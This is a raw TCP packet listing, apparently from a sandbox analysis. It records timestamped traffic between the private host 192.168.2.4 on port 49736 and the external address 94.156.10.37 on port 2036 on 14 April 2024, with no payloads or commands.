Apr 14, 2024 08:45:12.506477118 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506501913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506539106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506551027 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506577969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506613016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506623030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506652117 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506689072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506699085 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506726980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506764889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506773949 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506802082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506838083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506844997 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506876945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506913900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506923914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506953001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506989002 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506989956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507004976 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507026911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507062912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507074118 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507091999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507102013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507139921 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507153034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507179022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507216930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507226944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507253885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507291079 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507304907 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507328033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507364035 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507378101 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507405043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507443905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507450104 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507482052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507519960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507531881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507558107 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507596970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507606983 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507636070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507673025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507689953 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507710934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507747889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507760048 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507785082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507822990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507837057 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507859945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507898092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507909060 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.507935047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507972002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.507985115 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508008957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508045912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508058071 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508085012 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508127928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508160114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508166075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508205891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508236885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508259058 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508296967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508318901 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508332014 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508368969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508383989 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508407116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508444071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508460999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508481026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508518934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508533001 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508555889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508594990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508608103 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508631945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508670092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508686066 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508708000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508744955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508763075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508783102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508821011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508835077 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508861065 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508899927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508915901 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.508936882 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508975029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.508991003 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509011984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509048939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509068966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509085894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509123087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509139061 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509164095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509201050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509219885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509238005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509278059 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509299040 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509315968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509354115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509377956 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509391069 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509407043 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509428978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509447098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509466887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509483099 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509505987 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509522915 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509546995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509562969 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509583950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509598970 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509622097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509639025 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509660006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509676933 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509787083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509804964 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509824991 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509839058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509862900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509880066 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509902000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509918928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509939909 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509959936 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.509977102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.509999037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510015011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510035038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510054111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510075092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510091066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510107994 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510128975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510150909 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510166883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510183096 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510205030 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510222912 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510242939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510263920 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510281086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510301113 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510339022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510358095 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510381937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510396004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510421038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510441065 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510458946 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510478973 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510497093 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510514975 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510538101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510552883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510575056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510593891 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510612965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510632038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510649920 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510670900 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510689020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510705948 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510726929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510745049 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510765076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510782003 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510802031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.510818958 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.510859013 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.516927004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.516973019 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.726300001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726380110 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726398945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726408958 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726418972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726433992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726452112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726465940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.726469040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726488113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726505041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.726506948 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.726567030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736680031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736737967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736754894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736772060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736790895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736799955 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736809015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736826897 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736844063 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736851931 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736862898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736881018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736896992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736903906 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736916065 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736933947 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736934900 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736952066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736964941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.736969948 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736988068 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.736990929 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737005949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737023115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737035036 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737044096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737062931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737073898 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737082958 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737101078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737101078 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737119913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737139940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737139940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737159014 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737179041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737185955 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737196922 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737211943 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737214088 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737232924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737250090 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737250090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737260103 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737271070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737288952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737303019 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737306118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737323999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737341881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737356901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737373114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737374067 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737391949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737409115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737410069 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737426043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737442970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737447023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737461090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737477064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737478971 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737502098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737507105 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737519979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737535954 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737538099 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737555981 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737572908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737579107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737590075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737607956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737624884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737626076 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737643003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737656116 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737659931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737678051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737690926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737695932 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737713099 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737730026 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737731934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737750053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737767935 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737776041 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737786055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737797022 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737803936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737823009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737832069 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737843037 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737859964 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737860918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737879992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737900019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737903118 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737919092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737936974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737943888 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737956047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737972975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.737972975 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.737991095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738008022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738012075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.738025904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738045931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738053083 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.738065004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738084078 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.738122940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.738950968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.738970041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739017010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739037037 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739053965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739110947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739439964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739491940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739491940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739511967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739530087 CEST	2036	49736	94.156.10.37	192.168.2.4
